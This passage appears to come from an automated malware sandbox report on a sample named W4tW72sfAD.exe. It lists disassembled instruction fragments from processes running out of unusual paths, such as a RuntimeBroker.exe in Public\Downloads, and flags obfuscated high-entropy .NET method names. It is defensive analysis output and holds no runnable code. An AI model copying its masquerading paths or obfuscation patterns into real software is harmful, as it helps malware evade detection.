                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 20_2_00007FFD9B8C9DFA push eax; ret 20_2_00007FFD9B8C9E7D
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 21_2_00007FFD9B8B96D3 push FFFFFFE8h; ret 21_2_00007FFD9B8B96F9
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 21_2_00007FFD9B8E3B2B push eax; ret 21_2_00007FFD9B8E3B34
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 21_2_00007FFD9B8E9E6A push eax; ret 21_2_00007FFD9B8E9E7D
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 21_2_00007FFD9B8E9DFA push eax; ret 21_2_00007FFD9B8E9E7D
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 22_2_00007FFD9B8C3B2B push eax; ret 22_2_00007FFD9B8C3B34
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 22_2_00007FFD9B8C9E6A push eax; ret 22_2_00007FFD9B8C9E7D
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 22_2_00007FFD9B8C9DFA push eax; ret 22_2_00007FFD9B8C9E7D
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 22_2_00007FFD9B8996D3 push FFFFFFE8h; ret 22_2_00007FFD9B8996F9
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 22_2_00007FFD9B8B797E pushad ; retn 5F4Bh22_2_00007FFD9B8B7AAD
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9B76D2A5 pushad ; iretd 23_2_00007FFD9B76D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9B880580 pushad ; retf 23_2_00007FFD9B8805ED
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9B77D2A5 pushad ; iretd 24_2_00007FFD9B77D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9B89C2C5 push ebx; iretd 24_2_00007FFD9B89C2DA
                          Source: W4tW72sfAD.exe, 2Rq.csHigh entropy of concatenated method names: 'Q51', 'of3', '_5s2', '_15N', '_6N4', '_296', 'd63', 'RGh', 'I46', '_7E1'
                          Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.csHigh entropy of concatenated method names: 'c7Fg8tchQDAZE4INO3v', 'uHWS0BcyPmgmFY6ysAx', 'BPTavEfPI8', 'JV2ua5cNOro8egkKsWF', 'w24HmVc7PjtFJJtXI4t', 'bgW9OactUjdXdWLKPQq', 'HyO1cjcdqmXEkhQowD1', 'DSegNscfigTrSBwmZJL', 'z32YtXcuxv3t71Wh2PI', 'NM93iKc8vsfuuiDhPPj'
                          Source: W4tW72sfAD.exe, 9tn.csHigh entropy of concatenated method names: 'dO4WBHb1ySHiBZsgmm6', 'ul6GRYbDedgfrmd8bcV', 'HNu2dRbcRWx0UnYu9sL', 'EcLDKsbrXecemheStbD', 's8jvAhbojPvayBVO5Tu', '_8x6', '_1R8', '_3eK', '_1ly', '_216'
                          Source: W4tW72sfAD.exe, QD5.csHigh entropy of concatenated method names: 'v9g', '_9q4', '_831', '_1C5', '_1jS', 'zxRAkbWcvk8Ilog36jy', 'SdcBImWrB1UMEqhA159', 'hCAX09W1E05tgoaDwvY', 'IAqMRIWDpUNuA6Q0Nka', 'nDi3cjWoLMohy8Fb7QD'
                          Source: W4tW72sfAD.exe, cp1.csHigh entropy of concatenated method names: '_567', '_5yt', '_3Q9', '_5V4', '_5FV', 'ode92udDPHEgFTm1p1e', 'djFM0RdoTrOi4YcN66n', 'FXtKeIdreN3Yx5OcboN', 'OEnm3ud1QDlAdOJFQZ7', 'TJ9Ltbd5tPBP5NPp0NP'
                          Source: W4tW72sfAD.exe, dm4.csHigh entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
                          Source: W4tW72sfAD.exe, mY8.csHigh entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'q1P', '_947', '_2pM', '_12R', '_1f8', '_71D'
                          Source: W4tW72sfAD.exe, a65.csHigh entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'y73', '_8h4', 'nChrdP9lAfdlAA6fP6t', 'XPxSf39HhqddcYGMk9F', 'KlH9k19AMSAbnvYD3pm'
                          Source: W4tW72sfAD.exe, m4d.csHigh entropy of concatenated method names: 'ffp', 'Ao2', 'qw4', 'ioE6dPTHOKVe7wKuj1F', 'f3dTkoTAORQ27UG8axe', 'wcUFIYTgRBjGBf4O8PE', 'et5tFoTl5asl6GkMb7p', '_3hL', 'Y6e', 'ah8'
                          Source: W4tW72sfAD.exe, 56I.csHigh entropy of concatenated method names: 'ODM6APtRZbJ8uuKoj9R', 'AhAmmWtVMrsJqdC7bE2', 'habMQwtMSubMkNZXvip', 'hBLeeet2psJWxk8T07I', 'BfdmcKtnrO8nGE6ZWTp', '_7kT', '_376', 'B28', '_373', '_4p5'
                          Source: W4tW72sfAD.exe, sn1.csHigh entropy of concatenated method names: '_2iL', '_9Y6', '_7Bm', 'thf', '_3j1', 'IFL', 'z4c', 'A4gNTlWsh3GEevms8wd', 'Qwre61WeWtHwWMrsa8L', 'YiM7rhWi6hnurkKxFaX'
                          Source: W4tW72sfAD.exe, 136.csHigh entropy of concatenated method names: '_47i', 'A3wtUb0dsTCZQ8Zq877', 'gEXgdM07ocnUd7vpT5r', 'ReJcwT0tFI1AHdvZ452', 'qV9hFW0fKsqDQshHTRl', 'i5X', '_44S', 'W93', 'L67', '_2PR'
                          Source: W4tW72sfAD.exe, 18H.csHigh entropy of concatenated method names: '_55d', '_64r', '_69F', '_478', 'J4c', '_4D8', '_645', '_5BW', '_4qr', '_16d'
                          Source: W4tW72sfAD.exe, N43.csHigh entropy of concatenated method names: '_8l4', 'AHX', '_2fh', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'p4w'
                          Source: W4tW72sfAD.exe, 1y4.csHigh entropy of concatenated method names: 'AEm', 'by1', '_7Sc', 'uM7', '_197', 'rZu', 'Q1J', '_24u', 'U67', 'xj7'
                          Source: W4tW72sfAD.exe, s67.csHigh entropy of concatenated method names: 'w43', 'nZ5D4klzVr8vWTPMtMF', 'aZmKDdlqkwPhqmOjv2M', 'rmB4LtlEgtke4r08RSs', 'w2wx9EHeT0RWk4GfgLS', '_6Yf', 'BGIPbklcfkiMdxvjcZs', 'r6YJ8olrqlcZHHTlYZ1', 'aReZ6Xl1G1BN4rVnPhc', 'l7hyDdlDYkQs1RZRpsW'
                          Source: W4tW72sfAD.exe, B6D.csHigh entropy of concatenated method names: '_7as', 'dxy', '_8Kv', '_3c8', '_94E', '_31e', '_0023Nn', 'Dispose', 'G1ZYj0wV1GbTKYPe9KU', 'WMUAh6wMcEPijdGieiV'
                          Source: W4tW72sfAD.exe, 8B6.csHigh entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'P3U', 'j47', 'q8m1y4TB09gd3k34yQi', 'aFfbiaTpQhV2yM7uqD5', 'bd3NbJTjttZdnHdwkEt', 'mw8VPtTWH87mb7MY1Hf', 'vOjTvITU20VjjNAXgmb'
                          Source: W4tW72sfAD.exe, 1a2.csHigh entropy of concatenated method names: '_4c9', '_22S', '_6q7', 'I7kxd9lTqb9tbAuruEk', 'DGlvEQlv6puZAxCX2g6', 'Odv3WhlHRXFmsCb8jcH', 'q3VgkYlAvKJGjhkOjuY', 'LPyDeZlIy422DgIJlHM', 'p73', '_79A'
                          Source: W4tW72sfAD.exe, 9r9.csHigh entropy of concatenated method names: '_7K2', '_425', '_15J', 'aDDv0SY6mw61Et33gZH', 'GhInq6YagYRUxvtGlvd', 'RQ6uMEYGIg5mNo8KTlv', 'A0dgDlYmYTdBdsadTWq', 'tnd0opYksrH7x0rJCZn', '_81V', '_425'
                          Source: W4tW72sfAD.exe, 2A1.csHigh entropy of concatenated method names: '_25r', 'h65', 'NY9', '_1vl', '_728', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
                          Source: W4tW72sfAD.exe, 7d5.csHigh entropy of concatenated method names: 'aVj', 'Uk82aFkP2W09Q7ycNBY', 'Xp8EnpkJIW35bi9y24Y', 'f5Zg30kVZFy9NqKpqWw', 'njCEoukMDximPXNidTO', 'CPX', 'h7V', 'G6s', '_2r8', 'l39'
                          Source: W4tW72sfAD.exe, L32.csHigh entropy of concatenated method names: '_3z1', '_171', 'C6s', '_61p', '_0023Nn', 'Dispose', 'dDyLRlwaWjh99uC5uJN', 'EGRiJMwmIc8XZGSGT5Z', 'zcxAtyw67flcKFd5OtA', 'ceKZMGwkcDbGqJeM0qk'
                          Source: W4tW72sfAD.exe, wnO.csHigh entropy of concatenated method names: 'hI2', 'Y1OCypdIjptGMD6VNEv', 'KdOaUGdhvH3CrWn1BHr', 'F3jhQhdTcK8WwsUN8Rm', 'mbdULidvylU99kdFH9t', 'OmoU5ndyet3MygNAYlj', 'x4G', '_61h', 'PC5', 'pL7'
                          Source: W4tW72sfAD.exe, E32.csHigh entropy of concatenated method names: '_9O1', 'jMp', 'vTF', 'XcH', '_13h', 'k22', '_4tg', 'wk8', '_59a', '_914'
                          Source: W4tW72sfAD.exe, m9F.csHigh entropy of concatenated method names: '_7Ch', 'j31', 'j7q', 'uKJld8XZrOQERj7b3EL', 'C8OkaVX9wSax66ZPGFU', 'G53kUEXiemATyOnxPH9', 'YfjynVXsKHZAfPDCB3R', 'Hn5', '_273', '_223'
                          Source: W4tW72sfAD.exe, T1A.csHigh entropy of concatenated method names: 'aRT', '_1n3', 'y6v', 'v8PLgctph85VlW6Q2IG', 'gYZDkxtjkOD0cbW7T9G', 'U2fOjttJVw9mdwqZtDY', 'tX34CqtBXFDwtym4teI', 'mQFByvtW9nXSMY4FpOh', 'AKL0pbtUDiNvLkJsPVp', 'Aubn2itbwkJdFScmXdf'
                          Source: W4tW72sfAD.exe, 7w3.csHigh entropy of concatenated method names: 'F7d', 'TR1m9VQIl7Mp5wuE1f8', 'AuC29lQhfAkE84lgkfh', 'VtiepQQTT77tFMw4oRe', 'lOuSDuQvB91U6naUwAr', 'D7eO9lQypoI4VSyACqS', 'GDMnDbQXZsrALl4X0UY', 'UU8', 'd65', '_62b'
                          Source: W4tW72sfAD.exe, 67K.csHigh entropy of concatenated method names: '_8zr', 'ssF', 'AhC', 'Gzl', 'GTHZCeAuUIfYuvDvDqj', 'xZtrWOA827EHuknviln', 'SeAfRFAdutXETlQkGnx', 'WfDdIKAfrlqpoQnA0U8', 'V5ySVYA3YHW64PuVmHh', 'l2IqaJA2XWrMmMq5766'
                          Source: W4tW72sfAD.exe, 556.csHigh entropy of concatenated method names: 'n38', 'BTPZ4DQc0LlXZIgZmj2', 'rE7eiQQrPx5jDXuura5', 'SCYMtkQSNcVkR6bPArt', 'jlS9XyQKJXoGj4jOdUb', 'q9k7r2Q1NgB2yDsjAov', 'eq7', 'd65', '_43O', 'mI1'
                          Source: W4tW72sfAD.exe, gY4.csHigh entropy of concatenated method names: '_5t1', 'd65', '_2rM', 'H87', '_1a3', '_2r8', '_851', 'dy8OK3NCGcFmHFhlHal', 'H1kx8qNFe9m5pFQt1oH', 'xJHeFTNgimTucHDwNjb'
                          Source: W4tW72sfAD.exe, 624.csHigh entropy of concatenated method names: 'Yi3', '_492', '_975', '_2Kd', 'VWSowQNJlyF5M3ZpRfi', 'RQKCmrNBa4D97cTU1Di', 'waZ04cNpZCcZePUyMtM', 'XR9BYONM9Vhy4IjPCwB', 'zc3JMFNPRGti15H9EIw', 'ExlnqLNjICCYnBdMId6'
                          Source: W4tW72sfAD.exe, H62.csHigh entropy of concatenated method names: '_46E', 'd65', '_7sJ', 'IiX', '_851', '_267', 'yVeQe4QJEnySrA863ew', 'xnejYaQBNvGFogYcow2', 'tl1QljQpUbJZ4ybJeW3', 'tAyiKqQj3ITYaoaSyC8'
                          Source: W4tW72sfAD.exe, 3u3.csHigh entropy of concatenated method names: 'SwUtcD6UD7X7a2BB8sX', 'UFWYWs6bAZSiBj8lTHy', 'dbTPFF60mdywj2SJIhK', 'FH0Uep6jwE9d2NTj9Sr', 'ExU9A16WxsNHAJqaHZh', 'XZhQ0U6PdpId8xIvtVj', 'aZ9Nol6J4v4VfdT9XB6', 'fq056A6BBmBBWFArRTg', 'XCXY2r6VydwLPb05ibx', 'hWqpor6Mdlx291mWtEI'
                          Source: W4tW72sfAD.exe, 231.csHigh entropy of concatenated method names: '_9b1', '_8op', '_4Xs', '_885', '_74i', 'r8N', '_3Lk', 'Htz', 'J52', 'BV1'
                          Source: W4tW72sfAD.exe, Ed2.csHigh entropy of concatenated method names: '_8X5', 'd65', 'F1q', '_67U', 'kW7', '_851', 'Eh3bF2Q3be7mSsCreBK', 'cCUhmxQ2NZF2A5qyEn7', 'KuAH76QnNTADbKcJNPd', 'veuolqQuPlkkjWHyPJg'
                          Source: W4tW72sfAD.exe, QW6.csHigh entropy of concatenated method names: 'vI2', '_9gU', '_63P', 'hn3', 'Fd4', '_9eJ', '_9W7', 'FtpM2TLX4qxBfYvNcyb', 'eb2Ue5LLZBPR5vjMHpB', 'oI7sK1LQQKQT6wR1s1I'
                          Source: W4tW72sfAD.exe, geUwbRLwd0WNm7K3QP.csHigh entropy of concatenated method names: 'AUFzX9bS1O', 'MyNiDIciY0c3IYtMr94', 'CoUZ0Ncsm5TomLOPjqP', 'VaGynZcZPyiv6oDBQyq', 'B5WxrMc9Kfe2JGk6DsK', 'y2BJ4mcClYD009G4HNi', 'UBKKufKzev9HatByLmt', 'cdwF5dceksDnnWBPET5', 'wITIjdcFEqc0fOX0P1C', 'HqOOKtcg9xscR0V6h95'
                          Source: W4tW72sfAD.exe, j11.csHigh entropy of concatenated method names: '_18q', 'FKm15RsXXePwq3MLTKa', 'xK0umUsLcWcCWxBRqtr', 'CJHnEpshwOKGFZ8lKUD', 'I2il1LsyYxUyg8Z4Chn', 'UdXhvMsQ97fq6FxiFRo', '_5N9', 't27', 'm4U', 'x67'
                          Source: W4tW72sfAD.exe, i1D.csHigh entropy of concatenated method names: 'U94', 'yxoMpryPXHLA3UQSELu', 'SfFfDsyJJZ9jTED8Rv0', 'D7MuMHyBxnMk2GpvrJs', 'gPO7J4yV1KiWXPv3dTV', 'EXq4NdyMfM7Qw0vlKYL', 'Icyi4vypURktyA5GnqW', '_7F4', 'i21JbiytYfIpoVn9y4b', 'jAI2l0yd3eXPLLIwMFH'
                          Source: W4tW72sfAD.exe, 2L3.csHigh entropy of concatenated method names: 'WJy', 'L71', '_285', '_653', 'DcU', 'OQv6S2JqsoKVK0DkBlp', 'OH5VP2JEG1uYdOOy6Hu', 'EanQexJxpfGxkYOdiM5', 'Nq14MgJOxBK4E9T1Yn4', 'P7QvPyJzy4YG8oNmQfW'
                          Source: W4tW72sfAD.exe, 655.csHigh entropy of concatenated method names: 'M4n', 'rd6', 'cYGxb2FgwNfGI1WSBAZ', 'nofOsIFCjLToqjJFJ8F', 'KjfLutFFxhcgikRVTHg', 'XjpOVfFl9UJSrgJSKI5', 'tawKOfFHZHa5a8eeKuV', 'imEdYWFAMwfZDW7qULl', 'QhSDe4FTZHP9iet4et0', 'CZfgZ5Fv9lBI3Wq7Pxf'
                          Source: W4tW72sfAD.exe, 954.csHigh entropy of concatenated method names: 'kF1', '_757', 'NMKxrCJhYqjiJYKLO1P', 'EAQqmvJy2gmvvRgntQR', 'j7jtoAJXdM30x2sg2FO', 'eR8Xd1JLnhjpblKanoP', 'Tqc35cJQJx3tmedx3Zk', 'Fgcso3JNO4hlh9kFcsm', 'ox8ClZJ7bLedmFhtZrl', 'VA86CxJtPVUCipwEE7f'
                          Source: W4tW72sfAD.exe, OBqe2IUAeSpOmlOQ4O.csHigh entropy of concatenated method names: 'nOQdl4ODOg', 'tY3dXGtH5f', 'q9qdvQao7g', 'DpYddoq5nS', 'vUcduRRnlL', 'sqedUSL72O', 'MNddRugcTR', 'd6IBJRRp2Z', 'c8idQhNv3S', 'V1kdEyl02V'
                          Source: W4tW72sfAD.exe, 3J8.csHigh entropy of concatenated method names: 'L2l', 'Jo5', '_2EF', 'i4P', '_6c7', '_77i', '_38r', '_142', 'Xhv', 'eT3'
                          Source: W4tW72sfAD.exe, yW3.csHigh entropy of concatenated method names: 'ZF7', 'XPR', 'ID35sFAbwgY5fOFUjnP', 'jgJOaMA0njiV5YywCbY', 'HUuWmdAWL0d3wH2PNfU', 'Ac0dqSAU18iBhQNO2Vd', 'Jk9ILTAGWAFt091RHtv', 'UnUC3JAm1XDWQHwJEDM', 'mv18tPA6UEtpCow5FCE', 'cN49y4Aa4mc5TlOhHPn'
                          Source: W4tW72sfAD.exe, itVrv600AOcMBhsiIT.csHigh entropy of concatenated method names: 'xdJaHaLaiy', 'V2DaSkpaDo', 'ojWablkBNc', 'DyHamcAFke', 'ArCa6Di0WB', 'EJyataZqWW', 'T7haJgpFAl', 'kNGa25aRtf', 'lj7acrWjTB', 'PYIahvCHho'
                          Source: W4tW72sfAD.exe, 11M.csHigh entropy of concatenated method names: 'P5u', '_434', '_53T', '_7g1', 'b6C', 'lMUrcZfUC0PuryVeJFp', 'GiaNpSfbRxoUsRcCwBd', 'tDQPvVfjcbjqxhhBZNL', 'gm2URDfWTm6ntfesfGY', 'iUS6Auf05HyfbmjcZgN'
                          Source: W4tW72sfAD.exe, 7p3.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', '_89Q', 'kwo', '_8y8', 'DIw9xxThJ2cUIpMKYEY', 'qYkscVTyhguaT4kMHtr', 'xec7mfTvpjWKLx5aOUF', 'KoqOY9TITogJB7Zf4Dc', 'lnVK6LTXiZyuO0qrsSn'
                          Source: W4tW72sfAD.exe, Z57.csHigh entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', '_43v', '_8h4', 'ylOoUg9mECRXBpfpBGS', 'y58JLD96Xe77pXZ6cv8', 'mul5uP9aJlcF9WfRqQ6'
                          Source: W4tW72sfAD.exe, ifL.csHigh entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', '_5I1', '_1v2', 'gY2', 'rV4', '_28E'
                          Source: W4tW72sfAD.exe, W1w.csHigh entropy of concatenated method names: '_6L3', '_3Ev', 'M8uPqhIXHl0Kc0fnJqq', 'slxmxiILCmUdQqr2Jw6', 'w6YgX0IhvlsK8sd5T7p', 'hP2n3qIyN48WrAQdH5K', 'yVO443IQtgxhgK1Trn0', '_87m', '_5Dz', 'qTpUJeITcf2lKK6beyQ'
                          Source: W4tW72sfAD.exe, 26v.csHigh entropy of concatenated method names: 'Ik8', '_6PE', '_544', 'AlygZ6h6vM8NyUCJ3wG', 'eBfeythaU2Yl7oRtNHu', 'Udj57yhGmFP7VE3ES4N', 'HF9p3ZhmHGi6H3yyShu', '_6iD', 'PUk', '_5x3'
                          Source: W4tW72sfAD.exe, 64r.csHigh entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', '_124', 'so6PkgkKPQePHRr6Vru', 'z8pH4DkcPskE2NdXEjk', 'Ug2Wbmkr5ucKfsYWjB0', 'Rh6SlSk1BpfxGH6cDK2', 'MQZAwBkDwUsLHrlyDfm', 'bxHRaGkoJrnygJU6BxT'
                          Source: W4tW72sfAD.exe, TZ2.csHigh entropy of concatenated method names: 'My5', 'V4X', 'zT6', '_457', '_1in', '_2rC', '_8j5', 'jsoM8O72YjiTRpv2DD8', 'aI5akg7nA8vlFvjCEVU', 'vghCtE78J16Kn27t2lA'
                          Source: W4tW72sfAD.exe, 7O8.csHigh entropy of concatenated method names: '_93a', '_383', '_4w4', 'W2J', 'JX4', '_13F', 'XLI', '_64n', 'CdD', '_2y7'
                          Source: W4tW72sfAD.exe, jv4.csHigh entropy of concatenated method names: '_1ay', 'V29', 'FLl', 'QUh', '_2Q4', '_68a', 'S2i', '_8h4', 'wMuvaBZq5MLYGByXsAb', 'oHBV91ZERXcJ5i0j5fv'
                          Source: W4tW72sfAD.exe, 781.csHigh entropy of concatenated method names: '_54f', 'd65', '_917', 'HI7', '_119', '_851', 'ii6HgDLUDUMxKKsxe1c', 'ywVqCuLb1HMYAi9Lw0g', 'GFOxjcL0EKZsj2KIE9v', 'YXnuJWLjQpCy7xaFlQK'
                          Source: W4tW72sfAD.exe, 9EL.csHigh entropy of concatenated method names: '_2SY', '_589', '_853', '_16O', 'ojwemcNGwQdPKBicMKV', 'CI1aGsNmhomY3L7FtHu', 'ca9DYgNb2tb5iWSqRJj', 'hTcsS7N0qxwZJf90voF', 'MZvahXN6UU8p5enY4YS', 'zgiHRENaBiVtRXlAAac'
                          Source: W4tW72sfAD.exe, eh3.csHigh entropy of concatenated method names: '_5xP', 'f34', '_37Q', '_294', 'S8l', '_517', '_3A6', '_29Q', '_51Q', 'acq'
                          Source: W4tW72sfAD.exe, 4v1.csHigh entropy of concatenated method names: 'P4B', 'tTbDqDFU56MDNmdIL7d', 'cZnY3oFbrq0SHWBAoNB', 'ixQNYHFjnAxx8jGbXSn', 'rQrteuFWOHPqceLdDCy', 'Qqm8WUF0BDkgp55NIjh', 'xTLvB7FGJaYmoV7ALsb', 'orip4nFmLopfq04du0a', 'j09H4SF63XLuXOmgnmU', 'ILL3O8FapTlGnit9CuC'
                          Source: W4tW72sfAD.exe, 3rw.csHigh entropy of concatenated method names: 'N4R', '_9ke', 'HtShbnCxCMJlEB6QMXg', 'vD9gA6COh8MaqPg6EjE', 'gIwutqC5sCcAJCfkSDr', 'dUQkw8C4oM9Uiv4MeoT', 'tSf8ZhCqPufJa8mWsU6', 'j87BL0CETxXAlmXGOlX', 'K57bHKCzpgL9Eln7j2A', 'ckQnKGFeJR9LnB2uBG3'
                          Source: W4tW72sfAD.exe, 97s.csHigh entropy of concatenated method names: 'Mnm', '_414', 'l54', '_6g7', '_5Xs', '_294', 'xi1', '_66G', 'CAV', 'hjw'
                          Source: W4tW72sfAD.exe, 89G.csHigh entropy of concatenated method names: '_3n7', 'SqgnbLAzRjYtXgemKa5', 'xQJn3hTet66ChXxoPos', 'XdigkDAqXLgNDSeZCgb', 'mfyPDKAER57aNqTBBJC', 'zvZtP6TimuRabtBAx3y', '_27M', 'Fq3', 'EfD', 'QOdRBbA58jxoiQnb2YI'
                          Source: W4tW72sfAD.exe, 76n.csHigh entropy of concatenated method names: 'QD5', 'dCSypbH9BA3eOaywQSj', 'fX8LyQHCXEZDN60qhWD', 'Ercl8EHFHRyYpo1SeMb', 'LfZ0cUHgkrJ30xa5PKm', 'Y24J5AHlNIqOeFuHvxC', 'lIp1tkHHjRB5XwT3uBS', 'kpENWiHs9xLydMJF9hY', 'mUlBcVHZLomWVrQjoiK', 'V2vb7gHATkAcYXGdRw6'
                          Source: W4tW72sfAD.exe, EO5.csHigh entropy of concatenated method names: '_737', 'Z98', 'E4Q', 'ly9', 'ChGV0daUe6uLnVy2TeZ', 'OO1hwBabpTtTRH0jmwD', 'cXjuTca0jFdjuo1bbtj', 'AKnF4taGm6qwhiYHBls', 'a370IyamkoInQ2osVSh', 'qu3JOha6h3jRvrhd1u1'
                          Source: W4tW72sfAD.exe, 857.csHigh entropy of concatenated method names: '_599', 'kf4', 'SJ2', '_736', 'P3r', '_85L', 's31', 'vFqifhZsWY6AZurrb6U', 'MvlIGWZZLn5AkudtWOL', 'XlK5LqZ9dfP7enjeZs8'
                          Source: W4tW72sfAD.exe, by1.csHigh entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', '_673', '_8h4', 'KDx7kPCAbqfkL2LW3Um', 'pwvqiLCT35VcEuOOn8k', 'uI0kMcCv2UaLEX0n9p4'
                          Source: W4tW72sfAD.exe, C9C.csHigh entropy of concatenated method names: '_34V', 'y7u', 'PG4', '_7FG', 'gt1', 'xQ8vItNOMrfZDHGXGPn', 'HddjerNqW3Us5pFKYmY', 'rg92rcNEcCBbI1j4X7x', 'UEqiP8Nz02qZhy2d91Q', 'YFZcAw7eJPV2rZd21JX'
                          Source: W4tW72sfAD.exe, 7YK.csHigh entropy of concatenated method names: '_2N6', '_22i', '_239', 'liwnEqgBUaHQPQTWQXm', 'thA7TngpdaSZ9sVppfp', 'mondHBgjJFa1WaQHdkp', 'nZTecSgWr2YuldClLQI', 'MtbdNVgPpdWcbmJBlIx', 'bUu09agJcr5SE67qwYU', 'wNRTNJgU35NQ0sJUsgd'
                          Source: W4tW72sfAD.exe, 6pX.csHigh entropy of concatenated method names: '_966', '_33e', 't8s', '_1Lg', '_127', 'LT8', 'mmGR5qBdPuN0EeUIoea', 'gImtKRBf5mINDvHD2Ye', 'z5eFoxB7Fd1EcRNqy5d', 'zsNMX1BtQpfKwGZoVOG'
                          Source: W4tW72sfAD.exe, 3Xk.csHigh entropy of concatenated method names: 'zf8', 'R9w', '_182', 'G3G', '_75Z', 'E8M', 'vnBMtsKl26tI0hRI9Ph', 'GJlRm3KHLERrucv6i09', 'Axu7wXKA2R628xW4MeE', 'DI3sR3KTye6VUFv7L94'
                          Source: W4tW72sfAD.exe, Z2c.csHigh entropy of concatenated method names: 'B58', 'rye', 'pEfbofS4FjCc7FXm20K', 'zxIsC4Sx7b60AOFxDWl', 'Tie95lSoSB5Skedoatc', 'UWDftNS5K3PsV19dTpy', 'raQg9iSO7CZQZTB7auP', 'Wcml0sSqsM0ran2VOY4', 'eRHhZwSEpfMDcrNpW2J', '_9f6'
                          Source: W4tW72sfAD.exe, r2O.csHigh entropy of concatenated method names: 'uFH0d1Vg58NJgGWUkMt', 'j3FBw2VCScDCdxgTpjp', 'xKqPNFVFtDtYBQAi35O', 'XJCS6QVlfqIk6FTWJAE', 'X16', 'bCppakVvjvDRGnGKE6Q', 'jFuKhJVAZMdigsPpWZb', 'CJA9t8VTWUpoXaMdhBG', '_9S9', 'ailPoTVXooZovOiU1Ei'
                          Source: W4tW72sfAD.exe, X66.csHigh entropy of concatenated method names: '_26F', '_5ml', '_376', '_1r8', 'z89', 'maepmm7Tauw9TpDKsQG', 'UfOhI97vbwy4D7mL7Zs', 'YghXHW7IZYEA9TLjUj2', 'FxLo687hgIk8DILE2Wj', 'sjADli7yZYB66yBvOSR'
                          Source: W4tW72sfAD.exe, s64.csHigh entropy of concatenated method names: '_7P7', 'yt7', '_22g', 'xhGnWLC6wwZpN68WtLO', 'nFF4DRCGKR5AR0fGtge', 'Rc4jBECmCWvkZnJoxgi', 'oY3rGCCabMdiWiOISH3', 'WA2cybCkSA7TpiPbBnZ', 'Pgx9IaCwrONYACrbsxU', 'CTwHm0CYU8XMg7eBSIw'
                          Source: W4tW72sfAD.exe, 735.csHigh entropy of concatenated method names: '_413', 'V29', '_351', '_2Q4', 'H7R', '_14W', '_8h4', 'QSkgPq9xpTt9L7asxuJ', 'fFo5WU9OkBAdeRvekWh', 'JsffSR9qtCD5fGUeud4'
                          Source: W4tW72sfAD.exe, 2T9.csHigh entropy of concatenated method names: 'K77', '_5fJ', 'E32', '_9FP', '_55q', '_8E4', 'V27', 'J8g', '_0023Nn', 'Dispose'
                          Source: W4tW72sfAD.exe, rG4.csHigh entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'iSkawnXLIwh7IxNX2OC', 'zA6RtmXQETAwfGY9UwP', 'nm79kTXNNEvGvkNuYvR', 'wxLHXBX7vvRiT1SRkKc'
                          Source: W4tW72sfAD.exe, r19.csHigh entropy of concatenated method names: 'j9l', '_778', '_453', '_5c3', 'hE4', 'z3n', 'N42', 'CwiKKkfdhDyYjMIsunO', 'jbj8tZffg1b5ylHWi2T', 'CYfyvrf7ewb7pngASLk'
                          Source: W4tW72sfAD.exe, J68.csHigh entropy of concatenated method names: 'SB9', 'Z7D', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'a37', '_96S', '_9s5'
                          Source: W4tW72sfAD.exe, c6y.csHigh entropy of concatenated method names: 'v47', 'ACyjwjNihU1gTQY7OT3', 'RYhtwTQzRt3YfG7bdRj', 'ydTo6wNeuA3hySB5jLR', 'y0NOgANs6s9rT9mcNdI', 'ru1UJGNZcZ86JOiDU2l', '_53Y', 'd65', 'e16', 'B2m'
                          Source: W4tW72sfAD.exe, 39Q.csHigh entropy of concatenated method names: '_66V', 'enekxuhSLegjGFwQYro', 'qVvBI7hKXqSq2tDlxLF', 'VBmqPVhcyZIB4a7LHKl', 'GShMr2hrFnO8nvq4niA', 'MQFRbXh1If4m443GkgK', 'o5QqprhDEgMS2iqMimD', 'LnUDQFhoEDx7aetKE83', 'kVylngh5grd6TkyL1r0', 'ICokdsh4fd7JyAHQyZB'
                          Source: W4tW72sfAD.exe, V66.csHigh entropy of concatenated method names: 'rvt', 'K29', '_39k', 'iZ5ZqIBhk2g9Zmu8eah', 'U1Dn4KByhHKm798124B', 'wKuHnPBvssqE3McCNEU', 'tJb6SNBIXA46f0m9whX', 'brw2PYBXH5b8Ag5JiQB', 'btQLqsBLxyILXnfrWlf', 'rDo1B4BQfF3idyIrbRb'
                          Source: W4tW72sfAD.exe, r4r.csHigh entropy of concatenated method names: '_228', '_34p', '_2r3', 'm3t', 'sC3', 'f4cjgEud6hPE6Z7jC4L', 'jymJAYu7JUt5reBGwUA', 'cZgUvTutYNhpeba5nhQ', 'seDSMnuflW9x5r5aRHR', 'pNEmLluu3oZWeFbeqHy'
                          Source: W4tW72sfAD.exe, Z47.csHigh entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
